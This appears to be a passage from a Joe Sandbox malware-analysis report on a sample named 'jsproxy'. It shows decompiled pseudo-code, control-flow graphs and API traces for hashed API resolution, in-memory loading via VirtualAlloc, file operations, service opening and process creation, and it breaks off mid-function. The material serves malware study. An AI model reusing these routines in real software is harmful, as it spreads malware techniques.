                                                                                0x002a85a9
                                                                                0x002a85a9
                                                                                0x002a85af
                                                                                0x00000000
                                                                                0x002a84fd
                                                                                0x002a8503
                                                                                0x002a8543
                                                                                0x00000000
                                                                                0x002a8505
                                                                                0x002a850b
                                                                                0x00000000
                                                                                0x002a8511
                                                                                0x002a8511
                                                                                0x002a8518
                                                                                0x002a851f
                                                                                0x002a8524
                                                                                0x002a852b
                                                                                0x002a8530
                                                                                0x002a8530
                                                                                0x002a853a
                                                                                0x002a853c
                                                                                0x00000000
                                                                                0x002a853c
                                                                                0x002a850b
                                                                                0x002a8503
                                                                                0x002a84fb
                                                                                0x00000000
                                                                                0x002a84ef
                                                                                0x002a85c8
                                                                                0x002a85ce
                                                                                0x002a8630
                                                                                0x002a8635
                                                                                0x002a8637
                                                                                0x002a863e
                                                                                0x002a8643
                                                                                0x002a864a
                                                                                0x002a864f
                                                                                0x002a864f
                                                                                0x002a8660
                                                                                0x002a8662
                                                                                0x00000000
                                                                                0x002a85d0
                                                                                0x002a85d0
                                                                                0x002a85d6
                                                                                0x00000000
                                                                                0x002a85d8
                                                                                0x002a85de
                                                                                0x002a85e0
                                                                                0x002a85e7
                                                                                0x002a85ec
                                                                                0x002a85fa
                                                                                0x002a85fa
                                                                                0x002a861d
                                                                                0x002a861f
                                                                                0x002a8621
                                                                                0x002a8624
                                                                                0x00000000
                                                                                0x002a8626
                                                                                0x002a8626
                                                                                0x00000000
                                                                                0x002a8626
                                                                                0x002a8624
                                                                                0x002a85d6
                                                                                0x00000000
                                                                                0x002a85b1
                                                                                0x002a85b1
                                                                                0x002a85b1
                                                                                0x002a85bd
                                                                                0x002a85bd
                                                                                0x002a85c7
                                                                                0x00000000

                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,3251FEFE), ref: 002A861D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2305597011.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2305564478.00000000002A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000D.00000002.2305633120.00000000002AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000D.00000002.2305667381.00000000002AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_2a0000_jsproxy.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID: ) `3$) `3$6w:$6w:$=
                                                                                • API String ID: 823142352-4124229693
                                                                                • Opcode ID: 42cc0307ca8b2d6dbc19f3cde93561c950e34f85bace781cc50ca16004237487
                                                                                • Instruction ID: 7458b1dea5ab337597e3b92ffe97000defc8724dd5e1423664bc1696470450ab
                                                                                • Opcode Fuzzy Hash: 42cc0307ca8b2d6dbc19f3cde93561c950e34f85bace781cc50ca16004237487
                                                                                • Instruction Fuzzy Hash: 4E611771A283129FD714DF28C54962FBBE5ABE5714F00881DF4998B290EFB4CD158F82
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00290D60, Relevance: 9.1, APIs: 6, Instructions: 124memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 160 290d60-290dd5 call 290ed0 VirtualAlloc RtlMoveMemory 164 290ddb-290dde 160->164 165 290ebe-290ec4 160->165 164->165 166 290de4-290de6 164->166 166->165 167 290dec-290df0 166->167 167->165 169 290df6-290dfd 167->169 170 290eaf-290ebb 169->170 171 290e03-290e36 call 291140 RtlMoveMemory 169->171 171->165 175 290e3c-290e4a VirtualAlloc 171->175 176 290e89-290ea0 RtlFillMemory 175->176 177 290e4c-290e52 175->177 176->165 183 290ea2-290ea5 176->183 178 290e5a-290e68 177->178 179 290e54-290e56 177->179 178->165 180 290e6a-290e7d RtlMoveMemory 178->180 179->178 180->165 182 290e7f-290e83 180->182 182->165 184 290e85 182->184 183->165 185 290ea7-290ea9 183->185 184->176 185->170 185->171
                                                                                APIs
                                                                                  • Part of subcall function 00290FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 00290F08
                                                                                  • Part of subcall function 00290FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 00290F3E
                                                                                  • Part of subcall function 00290FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 00290F7F
                                                                                • VirtualAlloc.KERNEL32(?,?,00000000,?,?), ref: 00290DB4
                                                                                • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00290DC3
                                                                                  • Part of subcall function 00291140: lstrcpynW.KERNEL32(00000000,00000000,00000000,00000010,00290EFD,00000000), ref: 00291155
                                                                                • RtlMoveMemory.NTDLL(00000000,-00000018,00000028), ref: 00290E11
                                                                                • VirtualAlloc.KERNEL32(?,?,00000000,?,?), ref: 00290E3D
                                                                                • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00290E6C
                                                                                • RtlFillMemory.KERNEL32(00000000,?,00000000), ref: 00290E98
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2305527112.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_290000_jsproxy.jbxd
                                                                                Similarity
                                                                                • API ID: Memory$Move$AllocVirtual$Filllstrcpyn
                                                                                • String ID:
                                                                                • API String ID: 3581289920-0
                                                                                • Opcode ID: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                                                • Instruction ID: b1b73b58e43c1562788cb9fb49c39d3975ad00583a1e66f8611b7eec0de98871
                                                                                • Opcode Fuzzy Hash: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                                                • Instruction Fuzzy Hash: 1E31D6B1A14349AFDB54DB62CC84FAB73E9EBC8381F040D2CB98993351D635D8A1CB61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002A7120, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 107libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 186 2a7120 187 2a7125-2a712a 186->187 188 2a7130 187->188 189 2a71b4-2a71b9 187->189 190 2a7233-2a7248 call 2a34c0 188->190 191 2a7136-2a713b 188->191 192 2a71bb 189->192 193 2a7207-2a720c 189->193 214 2a724a-2a7260 call 2a3f00 call 2a3e60 190->214 215 2a7265-2a7278 LoadLibraryW 190->215 194 2a713d 191->194 195 2a7190-2a7195 191->195 197 2a71ee-2a7202 call 2a7080 192->197 198 2a71bd-2a71c2 192->198 199 2a720e-2a7222 call 2a7080 193->199 200 2a7227-2a722c 193->200 204 2a717a-2a718e call 2a7080 194->204 205 2a713f-2a7144 194->205 195->200 201 2a719b-2a71af call 2a7080 195->201 197->187 207 2a71c4-2a71c9 198->207 208 2a71d5-2a71e9 call 2a7080 198->208 199->187 200->187 203 2a7232 200->203 201->187 204->187 212 2a7146-2a714b 205->212 213 2a7164-2a7178 call 2a7080 205->213 207->200 216 2a71cb-2a71d0 207->216 208->187 212->200 221 2a7151-2a7162 call 2a7080 212->221 213->187 214->215 225 2a727a-2a7290 call 2a3f00 call 2a3e60 215->225 226 2a7295-2a72a0 215->226 216->187 221->187 225->226 237 2a72bd-2a72c5 226->237 238 2a72a2-2a72b8 call 2a3f00 call 2a3e60 226->238 238->237
                                                                                C-Code - Quality: 85%
                                                                                			E002A7120(void* __ebx) {
				void* _t2;
				struct HINSTANCE__* _t8;
				intOrPtr* _t9;
				intOrPtr* _t11;
				void* _t21;
				intOrPtr _t23;
				void* _t48;
				WCHAR* _t51;
				void* _t53;
				void* _t54;
				void* _t55;

				_t21 = __ebx;
				_t2 = 0x291da748;
				goto L1;
				do {
					while(1) {
						L1:
						_t54 = _t2 - 0x1a8031ec;
						if(_t54 > 0) {
							break;
						}
						if(_t54 == 0) {
							_t51 = E002A34C0(0x2ad830);
							__eflags =  *0x2add1c;
							if( *0x2add1c == 0) {
								 *0x2add1c = E002A3E60(_t21, E002A3F00(0x9bab0b12), 0xe4b28d97, _t53);
							}
							_t8 = LoadLibraryW(_t51);
							_t23 =  *0x2ae548; // 0x347de8
							 *(_t23 + 0x4c) = _t8;
							_t9 =  *0x2ae494;
							__eflags = _t9;
							if(_t9 == 0) {
								_t9 = E002A3E60(_t21, E002A3F00(0x9bab0b12), 0x7facde30, _t53);
								 *0x2ae494 = _t9;
							}
							_t48 =  *_t9();
							_t11 =  *0x2adf30;
							__eflags = _t11;
							if(_t11 == 0) {
								_t11 = E002A3E60(_t21, E002A3F00(0x9bab0b12), 0x5010a54d, _t53);
								 *0x2adf30 = _t11;
							}
							return  *_t11(_t48, 0, _t51);
						} else {
							_t55 = _t2 - 0x185e9846;
							if(_t55 > 0) {
								__eflags = _t2 - 0x18843476;
								if(__eflags != 0) {
									goto L21;
								} else {
									E002A7080(_t21, 0x2ad7a0, 4, __eflags);
									_t2 = 0x2eb73d4f;
									continue;
								}
							} else {
								if(_t55 == 0) {
									E002A7080(_t21, 0x2ad8f0, 2, __eflags);
									_t2 = 0x9da2520;
									continue;
								} else {
									if(_t2 == 0x9da2520) {
										E002A7080(_t21, 0x2ad800, 3, __eflags);
										_t2 = 0x18843476;
										continue;
									} else {
										_t57 = _t2 - 0x15a7f569;
										if(_t2 != 0x15a7f569) {
											goto L21;
										} else {
											E002A7080(_t21, 0x2ad860, 0, _t57);
											_t2 = 0x39797244;
											continue;
										}
									}
								}
							}
						}
						L30:
					}
					__eflags = _t2 - 0x2eb73d4f;
					if(__eflags > 0) {
						__eflags = _t2 - 0x39797244;
						if(__eflags != 0) {
							goto L21;
						} else {
							E002A7080(_t21, 0x2ad890, 1, __eflags);
							_t2 = 0x185e9846;
							goto L1;
						}
					} else {
						if(__eflags == 0) {
							E002A7080(_t21, 0x2ad7e0, 5, __eflags);
							_t2 = 0x22a44863;
							goto L1;
						} else {
							__eflags = _t2 - 0x22a44863;
							if(__eflags == 0) {
								E002A7080(_t21, 0x2ad8c0, 6, __eflags);
								_t2 = 0x1a8031ec;
								goto L1;
							} else {
								__eflags = _t2 - 0x291da748;
								if(__eflags != 0) {
									goto L21;
								} else {
									_t2 = 0x15a7f569;
									goto L1;
								}
							}
						}
					}
					goto L30;
					L21:
					__eflags = _t2 - 0x21acdd7e;
				} while (__eflags != 0);
				return _t2;
				goto L30;
			}














                                                                                0x002a7120
                                                                                0x002a7120
                                                                                0x002a7120
                                                                                0x002a7125
                                                                                0x002a7125
                                                                                0x002a7125
                                                                                0x002a7125
                                                                                0x002a712a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x002a7130
                                                                                0x002a723f
                                                                                0x002a7246
                                                                                0x002a7248
                                                                                0x002a7260
                                                                                0x002a7260
                                                                                0x002a7266
                                                                                0x002a7268
                                                                                0x002a726e
                                                                                0x002a7271
                                                                                0x002a7276
                                                                                0x002a7278
                                                                                0x002a728b
                                                                                0x002a7290
                                                                                0x002a7290
                                                                                0x002a7297
                                                                                0x002a7299
                                                                                0x002a729e
                                                                                0x002a72a0
                                                                                0x002a72b3
                                                                                0x002a72b8
                                                                                0x002a72b8
                                                                                0x002a72c5
                                                                                0x002a7136
                                                                                0x002a7136
                                                                                0x002a713b
                                                                                0x002a7190
                                                                                0x002a7195
                                                                                0x00000000
                                                                                0x002a719b
                                                                                0x002a71a5
                                                                                0x002a71aa
                                                                                0x00000000
                                                                                0x002a71aa
                                                                                0x002a713d
                                                                                0x002a713d
                                                                                0x002a7184
                                                                                0x002a7189
                                                                                0x00000000
                                                                                0x002a713f
                                                                                0x002a7144
                                                                                0x002a716e
                                                                                0x002a7173
                                                                                0x00000000
                                                                                0x002a7146
                                                                                0x002a7146
                                                                                0x002a714b
                                                                                0x00000000
                                                                                0x002a7151
                                                                                0x002a7158
                                                                                0x002a715d
                                                                                0x00000000
                                                                                0x002a715d
                                                                                0x002a714b
                                                                                0x002a7144
                                                                                0x002a713d
                                                                                0x002a713b
                                                                                0x00000000
                                                                                0x002a7130
                                                                                0x002a71b4
                                                                                0x002a71b9
                                                                                0x002a7207
                                                                                0x002a720c
                                                                                0x00000000
                                                                                0x002a720e
                                                                                0x002a7218
                                                                                0x002a721d
                                                                                0x00000000
                                                                                0x002a721d
                                                                                0x002a71bb
                                                                                0x002a71bb
                                                                                0x002a71f8
                                                                                0x002a71fd
                                                                                0x00000000
                                                                                0x002a71bd
                                                                                0x002a71bd
                                                                                0x002a71c2
                                                                                0x002a71df
                                                                                0x002a71e4
                                                                                0x00000000
                                                                                0x002a71c4
                                                                                0x002a71c4
                                                                                0x002a71c9
                                                                                0x00000000
                                                                                0x002a71cb
                                                                                0x002a71cb
                                                                                0x00000000
                                                                                0x002a71cb
                                                                                0x002a71c9
                                                                                0x002a71c2
                                                                                0x002a71bb
                                                                                0x00000000
                                                                                0x002a7227
                                                                                0x002a7227
                                                                                0x002a7227
                                                                                0x002a7232
                                                                                0x00000000

                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(00000000,?,3251FEFE,002A68AC), ref: 002A7266
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2305597011.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2305564478.00000000002A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000D.00000002.2305633120.00000000002AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000D.00000002.2305667381.00000000002AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_2a0000_jsproxy.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID: Dry9$Dry9$}4
                                                                                • API String ID: 1029625771-3692699041
                                                                                • Opcode ID: e774f2dda613381394f51b27477a0fcec9aa20280993a37dc58a999a804cf480
                                                                                • Instruction ID: 50d51ca11c67c9d71592c58a1f0fda2d6d5badf725a5219fac3a9d05a386fc25
                                                                                • Opcode Fuzzy Hash: e774f2dda613381394f51b27477a0fcec9aa20280993a37dc58a999a804cf480
                                                                                • Instruction Fuzzy Hash: 1031E620B3C10147DA28AEB95C9433E51EA9BB3304F200076F456CBB55DD26CD324BDA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002A3780, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 102COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 246 2a3780-2a3793 247 2a37b0-2a37c5 246->247 248 2a3795-2a37ab call 2a3f00 call 2a3e60 246->248 253 2a37e2-2a37fa 247->253 254 2a37c7-2a37dd call 2a3f00 call 2a3e60 247->254 248->247 260 2a37fc-2a3812 call 2a3f00 call 2a3e60 253->260 261 2a3817-2a3832 253->261 254->253 260->261 267 2a384f-2a385e 261->267 268 2a3834-2a384a call 2a3f00 call 2a3e60 261->268 274 2a387b-2a38b4 267->274 275 2a3860-2a3876 call 2a3f00 call 2a3e60 267->275 268->267 281 2a38d1-2a38e2 SHFileOperationW 274->281 282 2a38b6-2a38cc call 2a3f00 call 2a3e60 274->282 275->274 282->281
                                                                                C-Code - Quality: 62%
                                                                                			E002A3780(void* __ecx, void* __edx, void* __edi, void* __esi) {
				char _v520;
				char _v528;
				char _v536;
				char _v1040;
				char _v1056;
				short _v1072;
				char* _v1076;
				char* _v1080;
				intOrPtr _v1084;
				intOrPtr* _t12;
				intOrPtr* _t14;
				intOrPtr* _t16;
				intOrPtr* _t18;
				intOrPtr* _t20;
				signed int _t26;
				void* _t36;
				void* _t63;
				void* _t66;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				struct _SHFILEOPSTRUCTW* _t73;

				_t70 =  &_v1072;
				_t12 =  *0x2addc0;
				_t66 = __ecx;
				_t63 = __edx;
				if(_t12 == 0) {
					_t12 = E002A3E60(_t36, E002A3F00(0xc6fbcd74), 0x7e0ae558, _t69);
					 *0x2addc0 = _t12;
				}
				 *_t12( &_v1072, 0, 0x1e);
				_t14 =  *0x2addc0;
				_t71 = _t70 + 0xc;
				if(_t14 == 0) {
					_t14 = E002A3E60(_t36, E002A3F00(0xc6fbcd74), 0x7e0ae558, _t69);
					 *0x2addc0 = _t14;
				}
				 *_t14( &_v1040, 0, 0x208);
				_t16 =  *0x2addc0;
				_t72 = _t71 + 0xc;
				if(_t16 == 0) {
					_t16 = E002A3E60(_t36, E002A3F00(0xc6fbcd74), 0x7e0ae558, _t69);
					 *0x2addc0 = _t16;
				}
				 *_t16( &_v520, 0, 0x208);
				_t18 =  *0x2ae298;
				_t73 = _t72 + 0xc;
				if(_t18 == 0) {
					_t18 = E002A3E60(_t36, E002A3F00(0x9bab0b12), 0xba782e65, _t69);
					 *0x2ae298 = _t18;
				}
				 *_t18( &_v1040, _t66);
				_t20 =  *0x2ae298;
				if(_t20 == 0) {
					_t20 = E002A3E60(_t36, E002A3F00(0x9bab0b12), 0xba782e65, _t69);
					 *0x2ae298 = _t20;
				}
				 *_t20( &_v528, _t63);
				_v1084 = 1;
				_v1080 =  &_v1056;
				_v1076 =  &_v536;
				_v1072 = 0xe14;
				if( *0x2ae30c == 0) {
					 *0x2ae30c = E002A3E60(_t36, E002A3F00(0xd9518805), 0x262a6194, _t69);
				}
				_t26 = SHFileOperationW(_t73); // executed
				asm("sbb eax, eax");
				return  ~_t26 + 1;
			}


























                                                                                0x002a3785
                                                                                0x002a3780
                                                                                0x002a378c
                                                                                0x002a378f
                                                                                0x002a3793
                                                                                0x002a37a6
                                                                                0x002a37ab
                                                                                0x002a37ab
                                                                                0x002a37b9
                                                                                0x002a37bb
                                                                                0x002a37c0
                                                                                0x002a37c5
                                                                                0x002a37d8
                                                                                0x002a37dd
                                                                                0x002a37dd
                                                                                0x002a37ee
                                                                                0x002a37f0
                                                                                0x002a37f5
                                                                                0x002a37fa
                                                                                0x002a380d
                                                                                0x002a3812
                                                                                0x002a3812
                                                                                0x002a3826
                                                                                0x002a3828
                                                                                0x002a382d
                                                                                0x002a3832
                                                                                0x002a3845
                                                                                0x002a384a
                                                                                0x002a384a
                                                                                0x002a3855
                                                                                0x002a3857
                                                                                0x002a385e
                                                                                0x002a3871
                                                                                0x002a3876
                                                                                0x002a3876
                                                                                0x002a3884
                                                                                0x002a388a
                                                                                0x002a3892
                                                                                0x002a389d
                                                                                0x002a38a6
                                                                                0x002a38b4
                                                                                0x002a38cc
                                                                                0x002a38cc
                                                                                0x002a38d5
                                                                                0x002a38d9
                                                                                0x002a38e2

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2305597011.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2305564478.00000000002A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000D.00000002.2305633120.00000000002AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000D.00000002.2305667381.00000000002AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_2a0000_jsproxy.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileOperation
                                                                                • String ID: X~$X~$X~
                                                                                • API String ID: 3080627654-3258893172
                                                                                • Opcode ID: 289398ca47f6d911a55808ef36195ab52e412de9ceddc29eefcf87ced11b4a19
                                                                                • Instruction ID: d31d6a8369846ee6c8c40c3b24a15bc1925c972550852fb192e35c4046eea612
                                                                                • Opcode Fuzzy Hash: 289398ca47f6d911a55808ef36195ab52e412de9ceddc29eefcf87ced11b4a19
                                                                                • Instruction Fuzzy Hash: 0431BE71A203014FDB14EB79EC0576BB7EAAB96704F00492DB816CB282FF34DA158B91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002A8E80, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 131serviceCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 288 2a8e80-2a8e98 289 2a8ea0-2a8ea5 288->289 290 2a8f7a-2a8f7f 289->290 291 2a8eab 289->291 292 2a9011-2a9016 290->292 293 2a8f85-2a8f8a 290->293 294 2a8f3f-2a8f46 291->294 295 2a8eb1-2a8eb6 291->295 292->289 298 2a8fce-2a8fd5 293->298 299 2a8f8c-2a8f91 293->299 296 2a8f48-2a8f5e call 2a3f00 call 2a3e60 294->296 297 2a8f63-2a8f75 294->297 300 2a901b-2a9022 295->300 301 2a8ebc-2a8ec1 295->301 296->297 297->289 303 2a8ff2-2a900c OpenServiceW 298->303 304 2a8fd7-2a8fed call 2a3f00 call 2a3e60 298->304 307 2a8fbb-2a8fc0 299->307 308 2a8f93-2a8fa3 299->308 305 2a903f 300->305 306 2a9024-2a903a call 2a3f00 call 2a3e60 300->306 309 2a8efc-2a8f03 301->309 310 2a8ec3-2a8ec8 301->310 303->289 304->303 323 2a9042-2a9049 305->323 306->305 307->289 311 2a8fc6-2a8fcd 307->311 318 2a8fae-2a8fb6 308->318 319 2a8fa5-2a8fac 308->319 314 2a8f20-2a8f2f 309->314 315 2a8f05-2a8f1b call 2a3f00 call 2a3e60 309->315 310->307 320 2a8ece-2a8ed5 310->320 314->323 335 2a8f35-2a8f3a 314->335 315->314 318->289 319->318 319->319 321 2a8ef2-2a8efa 320->321 322 2a8ed7-2a8eed call 2a3f00 call 2a3e60 320->322 321->289 322->321 335->289
                                                                                C-Code - Quality: 66%
                                                                                			E002A8E80() {
				short* _v4;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				void* _t4;
				void* _t6;
				intOrPtr* _t11;
				intOrPtr* _t15;
				intOrPtr* _t19;
				intOrPtr* _t22;
				void* _t25;
				void* _t42;
				short* _t43;
				intOrPtr _t44;
				short* _t45;
				void* _t46;
				void* _t47;

				_t25 = _v4;
				_t4 = 0x1779a150;
				_t46 = _v4;
				_t43 = _v4;
				_t42 = 0;
				goto L1;
				do {
					while(1) {
						L1:
						_t47 = _t4 - 0xebfcc22;
						if(_t47 <= 0) {
							break;
						}
						if(_t4 == 0x1779a150) {
							_t4 = 0x23287775;
							continue;
						} else {
							if(_t4 == 0x1e3d7119) {
								if( *0x2ae270 == 0) {
									 *0x2ae270 = E002A3E60(_t25, E002A3F00(0x26f5757c), 0x56e230f9, _t46);
								}
								_t6 = OpenServiceW(_t46, _t43, 0x10000); // executed
								_t25 = _t6;
								_t4 =  !=  ? 0xebfcc22 : 0xbf6010;
								continue;
							} else {
								if(_t4 != 0x23287775) {
									goto L22;
								} else {
									_t44 =  *0x2ae54c; // 0x30dfb0
									_t45 = _t44 + 0x260;
									while( *_t45 != 0x5c) {
										_t45 = _t45 + 2;
									}
									_t43 = _t45 + 2;
									_t4 = 0x10ada17;
									continue;
								}
							}
						}
						L32:
					}
					if(_t47 == 0) {
						_t11 =  *0x2ae4c8;
						if(_t11 == 0) {
							_t11 = E002A3E60(_t25, E002A3F00(0x26f5757c), 0xe9d3e51f, _t46);
							 *0x2ae4c8 = _t11;
						}
						 *_t11(_t25);
						_t42 =  !=  ? 1 : _t42;
						_t4 = 0xd10de09;
						goto L1;
					} else {
						if(_t4 == 0xbf6010) {
							_t15 =  *0x2ae18c;
							if(_t15 == 0) {
								_t15 = E002A3E60(_t25, E002A3F00(0x26f5757c), 0x268fe5f0, _t46);
								 *0x2ae18c = _t15;
							}
							 *_t15(_t46);
							goto L31;
						} else {
							if(_t4 == 0x10ada17) {
								_t19 =  *0x2ae310;
								if(_t19 == 0) {
									_t19 = E002A3E60(_t25, E002A3F00(0x26f5757c), 0x9ba7cd1, _t46);
									 *0x2ae310 = _t19;
								}
								_t46 =  *_t19(0, 0, 0xf003f);
								if(_t46 == 0) {
									L31:
									return _t42;
								} else {
									_t4 = 0x1e3d7119;
									goto L1;
								}
							} else {
								if(_t4 != 0xd10de09) {
									goto L22;
								} else {
									_t22 =  *0x2ae18c;
									if(_t22 == 0) {
										_t22 = E002A3E60(_t25, E002A3F00(0x26f5757c), 0x268fe5f0, _t46);
										 *0x2ae18c = _t22;
									}
									 *_t22(_t25);
									_t4 = 0xbf6010;
									goto L1;
								}
							}
						}
					}
					goto L32;
					L22:
				} while (_t4 != 0x2dd4caa9);
				return _t42;
				goto L32;
			}




















                                                                                0x002a8e82
                                                                                0x002a8e86
                                                                                0x002a8e8c
                                                                                0x002a8e91
                                                                                0x002a8e96
                                                                                0x002a8e98
                                                                                0x002a8ea0
                                                                                0x002a8ea0
                                                                                0x002a8ea0
                                                                                0x002a8ea0
                                                                                0x002a8ea5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x002a8f7f
                                                                                0x002a9011
                                                                                0x00000000
                                                                                0x002a8f85
                                                                                0x002a8f8a
                                                                                0x002a8fd5
                                                                                0x002a8fed
                                                                                0x002a8fed
                                                                                0x002a8ff9
                                                                                0x002a8ffb
                                                                                0x002a9009
                                                                                0x00000000
                                                                                0x002a8f8c
                                                                                0x002a8f91
                                                                                0x00000000
                                                                                0x002a8f93
                                                                                0x002a8f93
                                                                                0x002a8f99
                                                                                0x002a8fa3
                                                                                0x002a8fa5
                                                                                0x002a8fa8
                                                                                0x002a8fae
                                                                                0x002a8fb1
                                                                                0x00000000
                                                                                0x002a8fb1
                                                                                0x002a8f91
                                                                                0x002a8f8a
                                                                                0x00000000
                                                                                0x002a8f7f
                                                                                0x002a8eab
                                                                                0x002a8f3f
                                                                                0x002a8f46
                                                                                0x002a8f59
                                                                                0x002a8f5e
                                                                                0x002a8f5e
                                                                                0x002a8f64
                                                                                0x002a8f6d
                                                                                0x002a8f70
                                                                                0x00000000
                                                                                0x002a8eb1
                                                                                0x002a8eb6
                                                                                0x002a901b
                                                                                0x002a9022
                                                                                0x002a9035
                                                                                0x002a903a
                                                                                0x002a903a
                                                                                0x002a9040
                                                                                0x00000000
                                                                                0x002a8ebc
                                                                                0x002a8ec1
                                                                                0x002a8efc
                                                                                0x002a8f03
                                                                                0x002a8f16
                                                                                0x002a8f1b
                                                                                0x002a8f1b
                                                                                0x002a8f2b
                                                                                0x002a8f2f
                                                                                0x002a9042
                                                                                0x002a9049
                                                                                0x002a8f35
                                                                                0x002a8f35
                                                                                0x00000000
                                                                                0x002a8f35
                                                                                0x002a8ec3
                                                                                0x002a8ec8
                                                                                0x00000000
                                                                                0x002a8ece
                                                                                0x002a8ece
                                                                                0x002a8ed5
                                                                                0x002a8ee8
                                                                                0x002a8eed
                                                                                0x002a8eed
                                                                                0x002a8ef3
                                                                                0x002a8ef5
                                                                                0x00000000
                                                                                0x002a8ef5
                                                                                0x002a8ec8
                                                                                0x002a8ec1
                                                                                0x002a8eb6
                                                                                0x00000000
                                                                                0x002a8fbb
                                                                                0x002a8fbb
                                                                                0x002a8fcd
                                                                                0x00000000

                                                                                APIs
                                                                                • OpenServiceW.ADVAPI32(3251FEFE,?,00010000,?,3251FEFE,?,186D334D,0030DFB0,002A8782,?,3251FEFE,?), ref: 002A8FF9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2305597011.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2305564478.00000000002A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000D.00000002.2305633120.00000000002AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000D.00000002.2305667381.00000000002AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_2a0000_jsproxy.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: OpenService
                                                                                • String ID: uw(#$uw(#
                                                                                • API String ID: 3098006287-1105621689
                                                                                • Opcode ID: 1db4e372c8bb75450e83a583b3f6798fd6d85376841199befee3a598f1827bdb
                                                                                • Instruction ID: c60d87c348725e143b4ef14eae7f308f2fb69a6aa3b4ea1c8fc6542ec225c244
                                                                                • Opcode Fuzzy Hash: 1db4e372c8bb75450e83a583b3f6798fd6d85376841199befee3a598f1827bdb
                                                                                • Instruction Fuzzy Hash: 9E41EA21B34206DFDF20ABBDAC8473AA2D6AB97750F510429F946C7B51FE70CC514B91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002A4B70, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87processCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 343 2a4b70-2a4b80 344 2a4b9d-2a4bba 343->344 345 2a4b82-2a4b98 call 2a3f00 call 2a3e60 343->345 350 2a4bbc-2a4bd2 call 2a3f00 call 2a3e60 344->350 351 2a4bd7-2a4bf5 CreateProcessW 344->351 345->344 350->351 354 2a4c73-2a4c7a 351->354 355 2a4bf7-2a4bfd 351->355 357 2a4bff-2a4c13 355->357 358 2a4c14-2a4c1b 355->358 359 2a4c38-2a4c45 358->359 360 2a4c1d-2a4c33 call 2a3f00 call 2a3e60 358->360 367 2a4c62-2a4c72 359->367 368 2a4c47-2a4c5d call 2a3f00 call 2a3e60 359->368 360->359 368->367
                                                                                C-Code - Quality: 60%
                                                                                			E002A4B70(void* __ebx, WCHAR* __ecx, WCHAR* __edx, void* __ebp, int _a4, intOrPtr _a12) {
				struct _STARTUPINFOW _v72;
				struct _PROCESS_INFORMATION _v88;
